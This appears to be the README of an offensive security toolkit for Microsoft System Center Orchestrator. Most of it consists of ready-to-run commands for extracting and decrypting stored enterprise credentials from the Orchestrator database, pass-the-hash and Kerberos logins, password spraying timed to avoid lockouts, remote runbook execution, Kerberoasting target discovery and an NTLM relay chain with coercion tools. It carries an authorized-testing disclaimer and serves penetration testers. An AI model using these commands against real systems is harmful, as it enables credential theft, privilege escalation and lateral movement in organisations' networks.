Offensive security toolkit for Microsoft System Center Orchestrator (SCORCH). Single binary, cross-platform, works from non-domain joined systems.
System Center Orchestrator stores credentials for numerous enterprise systems (AD, SCOM, SCCM, VMM, Exchange, Azure) through Integration Packs. This toolkit provides comprehensive offensive capabilities:
- Security Assessment - Vulnerability scanning and misconfiguration detection
- API Enumeration - Discover runbooks, servers, folders, and jobs
- Credential Extraction - Extract and decrypt secrets from the database
- Runbook Execution - Execute automation with full parameter support
- Password Spraying - Credential validation at scale
- Network Discovery - Port scanning, LDAP enumeration, SPN discovery
- Cross-Platform Auth - NTLM, Pass-the-Hash, Kerberos, Basic auth from any OS
System Center Orchestrator consists of several components that present different attack surfaces:
| Component | Purpose | Default Port |
|---|---|---|
| Orchestration Database | SQL Server storing runbooks, credentials, and encrypted secrets | 1433 |
| Management Server | Central coordination between components | - |
| Runbook Server(s) | Execute runbooks using stored credentials | - |
| Web Service | REST/OData API for remote management | 81 |
| Web Console | Browser-based management UI | 82 |
Credentials stored in the database are encrypted using SQL Server's native encryption (ORCHESTRATOR_SYM_KEY). Integration Packs for AD, SCOM, SCCM, VMM, Exchange, and Azure all store their connection credentials here.
Reference: Microsoft SCORCH Architecture Documentation
# Clone and build
git clone https://github.com/professor-moody/scorch.git
cd scorch
go build -o scorch ./cmd/scorch/
# Cross-compile for Windows
GOOS=windows GOARCH=amd64 go build -o scorch.exe ./cmd/scorch/
# Cross-compile for Linux
GOOS=linux GOARCH=amd64 go build -o scorch ./cmd/scorch/The result is a single static binary with no external dependencies.
# Security assessment (no auth required)
./scorch assess -target scorch.corp.local
# Enumerate with NTLM from Linux
./scorch enum -t scorch.corp.local -d CORP -u admin -p 'P@ssw0rd' -all
# Pass-the-hash
./scorch enum -t scorch.corp.local -d CORP -u admin -H aad3b435b51404eeaad3b435b51404ee -all
# Dump credentials from database
./scorch dump -t sqlserver.corp.local -db Orchestrator -decrypt -sensitive
# Network discovery and SPN enumeration
./scorch discover -t dc01.corp.local -d CORP -u admin -p Pass123 -allChecks for common SCORCH security issues without authentication.
./scorch assess -target scorch.corp.local
# Output findings to JSON
./scorch assess -t scorch.corp.local -json -o findings.jsonChecks performed:
- Anonymous API access
- Authentication methods (NTLM, Basic, Negotiate)
- NTLM relay attack surface
- TLS configuration
- Information disclosure headers
- CORS misconfiguration
- Swagger exposure
Enumerate SCORCH resources via REST API.
# List all resources
./scorch enum -t scorch.corp.local -d CORP -u admin -p 'Pass123' -all
# Search for specific runbooks
./scorch enum -t scorch.corp.local -u admin -p Pass -search "backup"
# Find runbooks handling credentials
./scorch enum -t scorch.corp.local -u admin -p Pass -cred-search
# Get runbook details and parameters
./scorch enum -t scorch.corp.local -u admin -p Pass -id <guid>
# Export runbook (BUG: includes ALL encrypted global variables!)
./scorch enum -t scorch.corp.local -u admin -p Pass -export -id <guid> -o runbook.ois
# Scan job outputs for credential leakage
./scorch enum -t scorch.corp.local -u admin -p Pass -cred-leak
# Get execution statistics
./scorch enum -t scorch.corp.local -u admin -p Pass -statsOptions:
-all- Enumerate runbooks, servers, folders, jobs, activities-runbooks- List runbooks only-servers- List runbook servers-folders- List folder structure-jobs- List recent jobs-activities- List all activities (credential discovery)-events- System events (audit log)-stats- Execution statistics-search <query>- Search runbooks by name-cred-search- Find credential-handling runbooks by keyword-cred-leak- Scan job outputs for credential leakage patterns-export -id <guid>- Export runbook (leaks ALL encrypted variables!)-id <guid>- Get specific runbook details
Execute runbooks with parameters.
# Execute by ID with NTLM authentication
./scorch exec -t scorch.corp.local -d CORP -u admin -p Pass \
-id 12345678-1234-1234-1234-123456789012 \
-params "ServerName=DC01,Action=Restart" -wait
# Execute by name (will search for matching runbook)
./scorch exec -t scorch.corp.local -d CORP -u admin -p Pass \
-name "Restart Server" -params "Target=webserver01"
# Pass-the-hash execution
./scorch exec -t scorch.corp.local -d CORP -u admin \
-H aad3b435b51404eeaad3b435b51404ee \
-name "Deploy Updates" -wait
# Kerberos authentication
./scorch exec -t scorch.corp.local -kerberos -realm CORP.LOCAL \
-u admin -p Pass -name "Backup Database" -wait
# Fire and forget (don't wait for completion)
./scorch exec -t scorch.corp.local -d CORP -u admin -p Pass \
-id 12345678-1234-1234-1234-123456789012Execution Options:
-id- Runbook ID (GUID)-name- Runbook name (will search and prompt if multiple matches)-params- Parameters asName=Value,Name2=Value2-wait- Wait for runbook completion (polls status)
Extract credentials from SCORCH database.
# Show database info
./scorch dump -t sqlserver.corp.local -info
# Extract and decrypt all credentials
./scorch dump -t sqlserver.corp.local -all -decrypt
# Show plaintext passwords
./scorch dump -t sqlserver.corp.local -all -decrypt -sensitive
# SQL authentication
./scorch dump -t sqlserver.corp.local -u sa -p 'SqlPass!' -all -decryptRequirements:
- Network access to SQL Server (port 1433)
- For decryption:
Microsoft.SystemCenter.Orchestrator.RuntimeorAdminsdatabase role
Test credentials against SCORCH web service.
# Spray from user list with NTLM
./scorch spray -t scorch.corp.local -d CORP \
-users users.txt -pass 'Summer2024!'
# Multiple passwords with delay (avoid lockouts)
./scorch spray -t scorch.corp.local -d CORP \
-users users.txt -passwords passes.txt -delay 30s
# Parallel threads for faster spraying
./scorch spray -t scorch.corp.local -d CORP \
-users users.txt -pass 'Winter2024!' -threads 5
# Stop on first success
./scorch spray -t scorch.corp.local -d CORP \
-users users.txt -pass 'Pass!' -stop
# Quick test with specific creds (comma-separated)
./scorch spray -t scorch.corp.local -d CORP \
-user admin,svc_orch,backup -pass 'P@ssw0rd,Welcome1'Spray Options:
-users- File with usernames (one per line)-user- Single username or comma-separated list-passwords- File with passwords (one per line)-pass- Single password or comma-separated list-delay- Delay between attempts (e.g.,30s,1m)-threads- Number of concurrent threads (default: 1)-stop- Stop on first success
Discover SCORCH infrastructure via port scanning, LDAP enumeration, and SPN discovery.
# Port scan for SCORCH-related services
./scorch discover -t scorch.corp.local -ports
# Full discovery (ports + LDAP + SPNs)
./scorch discover -t dc01.corp.local -d CORP -u admin -p Pass123 -all
# LDAP enumeration for SCORCH accounts/computers
./scorch discover -t dc01.corp.local -d CORP -u admin -p Pass123 -ldap
# SPN discovery for Kerberoasting targets
./scorch discover -t dc01.corp.local -d CORP -u admin -p Pass123 -spn -jsonDiscovery Options:
-ports- Scan SCORCH-related ports (81, 82, 443, 1433, 389, 636, 88, 135, 445, 5985/6)-ldap- Enumerate LDAP for SCORCH service accounts, computers, and groups-spn- Discover HTTP/* and MSSQLSvc/* SPNs for Kerberoasting-all- Run all discovery methods-dc- Specify Domain Controller (default: target)-base-dn- Override LDAP base DN (default: auto-detect)
Note: LDAP/SPN enumeration requires password authentication. Pass-the-hash is not supported for LDAP.
Display version information.
./scorch version
# scorch v1.0.0The toolkit is designed to work from Linux or non-domain Windows:
| Method | Flags | Notes |
|---|---|---|
| Anonymous | (none) | Test unauthenticated access |
| Basic | -u user -p pass |
HTTP Basic auth |
| NTLM | -d DOMAIN -u user -p pass |
Windows NTLM |
| Pass-the-Hash | -d DOMAIN -u user -H nthash |
NTLM with NT hash |
| Kerberos | -kerberos -u user -p pass -realm REALM |
Kerberos with password |
| Kerberos (ccache) | -kerberos + KRB5CCNAME env |
Uses existing ticket cache |
| Kerberos (keytab) | -kerberos -u user -keytab /path/to/file |
Uses keytab file |
| Flag | Description |
|---|---|
-kerberos |
Enable Kerberos/SPNEGO authentication |
-realm |
Kerberos realm (defaults to uppercase domain) |
-kdc |
KDC address (optional, uses krb5.conf/DNS if not set) |
-keytab |
Path to keytab file |
-ccache |
Path to credential cache file |
NTLM from Linux:
# Uses go-ntlmssp for cross-platform NTLM
# IMPORTANT: Use NetBIOS domain name (CORP), not FQDN (corp.local)
./scorch enum -t scorch.corp.local -d CORP -u admin -p 'Password123' -all
# Debug authentication issues
./scorch enum -t scorch.corp.local -d CORP -u admin -p 'Password123' -debugPass-the-Hash:
# Use captured NT hash instead of password
./scorch enum -t scorch.corp.local -d CORP -u admin \
-H aad3b435b51404eeaad3b435b51404ee -allKerberos with password:
# Authenticate with username/password
./scorch enum -t scorch.corp.local -kerberos -u admin -p 'Password123' -realm CORP.LOCAL -allKerberos with existing ticket:
# Get TGT first
kinit admin@CORP.LOCAL
# Use existing ticket cache (automatic detection via KRB5CCNAME)
export KRB5CCNAME=/tmp/krb5cc_1000
./scorch enum -t scorch.corp.local -kerberos -all
# Or specify ccache path explicitly
./scorch enum -t scorch.corp.local -kerberos -ccache /tmp/krb5cc_1000 -allKerberos with keytab:
# Use service account keytab
./scorch enum -t scorch.corp.local -kerberos -u svc_scorch -keytab /etc/svc.keytab -realm CORP.LOCAL -allFor credential extraction, go-mssqldb supports:
- SQL Server authentication (username/password)
- Kerberos (if kinit configured)
# SQL auth - works from any platform
./scorch dump -t sqlserver.corp.local -u sa -p 'Password!' -all
# Kerberos from Linux (requires kinit first)
kinit admin@CORP.LOCAL
./scorch dump -t sqlserver.corp.local -allAll commands support:
| Flag | Description |
|---|---|
-json |
JSON output format |
-o file |
Write to file |
-q |
Quiet mode (suppress status) |
-debug |
Debug output |
| Flag | Short | Description |
|---|---|---|
-target |
-t |
Target server |
-port |
-P |
Port (81 for API, 1433 for SQL) |
-tls |
Use HTTPS | |
-skip-verify |
-k |
Skip TLS verification |
-timeout |
Request timeout (default: 30s, e.g., 1m, 60s) |
|
-username |
-u |
Username |
-password |
-p |
Password |
-domain |
-d |
Domain for NTLM (use NetBIOS name, not FQDN) |
-hash |
-H |
NT hash for PTH |
| ID | Severity | Finding |
|---|---|---|
| SCORCH-ANON-001 | CRITICAL | Anonymous API access |
| SCORCH-AUTH-001 | MEDIUM | NTLM without EPA |
| SCORCH-AUTH-002 | HIGH | Basic auth over HTTP |
| SCORCH-RELAY-001 | HIGH | NTLM relay attack surface |
| SCORCH-TLS-001 | HIGH | HTTP (unencrypted) access |
| SCORCH-TLS-002 | HIGH | Weak TLS (1.0) |
| SCORCH-CORS-001 | MEDIUM | Permissive CORS |
| SCORCH-INFO-001 | LOW | Server version disclosure |
./scorch assess -t scorch.corp.local
# Check for anonymous access, weak TLS, NTLM relay conditions./scorch dump -t sqlserver.corp.local -all -decrypt -sensitive -json -o creds.json
# Extract SCOM, VMM, SCCM, Exchange credentials# CRITICAL BUG: Any runbook export includes ALL encrypted global variables!
./scorch enum -t scorch.corp.local -u admin -p Pass -runbooks # Get any runbook ID
./scorch enum -t scorch.corp.local -u admin -p Pass -export -id <guid> -o export.ois
# Parse export.ois for encrypted variables, decrypt offline# Execute runbook that uses stored credentials
./scorch exec -t scorch.corp.local -d CORP -u user -p pass \
-name "Deploy to Server" -params "Target=dc01.corp.local" -wait# 1. Assess shows NTLM over HTTP without EPA
./scorch assess -t scorch.corp.local
# 2. Set up relay with ntlmrelayx
ntlmrelayx.py -t ldap://dc01.corp.local
# 3. Coerce auth to relay (SpoolSample, PetitPotam, etc.)SCORCH uses SQL Server native encryption:
ORCHESTRATOR_ASYM_KEY→ORCHESTRATOR_SYM_KEY→ encrypted data- Format:
`d.T.~De/[hex_data]`d.T.~De/
| Version | Base URL |
|---|---|
| Pre-2022 (OData) | /Orchestrator2012/Orchestrator.svc/ |
| 2022+ (JSON) | /api/ |
| Port | Service |
|---|---|
| 81 | Web Service/API |
| 82 | Web Console |
| 1433 | SQL Server |
For authorized security testing only. Obtain proper authorization before use.
